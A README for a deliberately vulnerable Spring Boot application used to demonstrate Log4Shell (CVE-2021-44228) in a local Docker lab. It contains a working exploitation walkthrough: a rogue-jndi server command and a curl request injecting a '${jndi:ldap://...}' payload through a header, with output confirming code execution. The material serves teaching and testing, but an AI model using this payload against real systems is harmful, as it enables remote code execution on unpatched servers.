# Log4Shell sample vulnerable application (CVE-2021-44228)

This is an almost copy/similar vulnerable application to

The main differences are maven instead of gradle, and the usage of rogue-jndi.

This repository contains a maven Spring Boot web application vulnerable to CVE-2021-44228, nicknamed [Log4Shell](

It uses Log4j 2.6.1 and JDK version 1.8.0_181.

## Running the springboot application

Build and run the docker springboot application:

docker build . -t vulnerable-app
docker run -p 8080:8080 vulnerable-app

## Exploitation
1. `git clone`
2. `cd rogue-jndi`
3. `mvn package`
4. `java -jar target/RogueJndi-1.1.jar --command "touch /tmp/test_if_rce" --hostname "192.168.1.x"`

Open a second terminal

5. `curl localhost:8080 -H 'X-Api-Version: ${jndi:ldap://192.168.1.x:1389/o=reference}'`

Where in both cases 192.168.1.x is your IP

`NOTE: don't use localhost, use your actual private IP address.

Now check if RCE was succesful:
$ docker ps                                 
CONTAINER ID   IMAGE            COMMAND                  CREATED         STATUS         PORTS                                       NAMES
04536dbd1dff   vulnerable-app   "java -jar demo-0.0.โ€ฆ"   2 minutes ago   Up 2 minutes>8080/tcp, :::8080->8080/tcp   gallant_easley

$ docker container exec -it 04536dbd1dff ash
/opt/app # ls /tmp
hsperfdata_root                          tomcat-docbase.8080.4585569232401237075
test_if_rce                              tomcat.8080.1707298461175346507

As you can see, the file `test_if_rce` exists. Which means RCE was succesful.


Code and ideas have been used from the following repositories: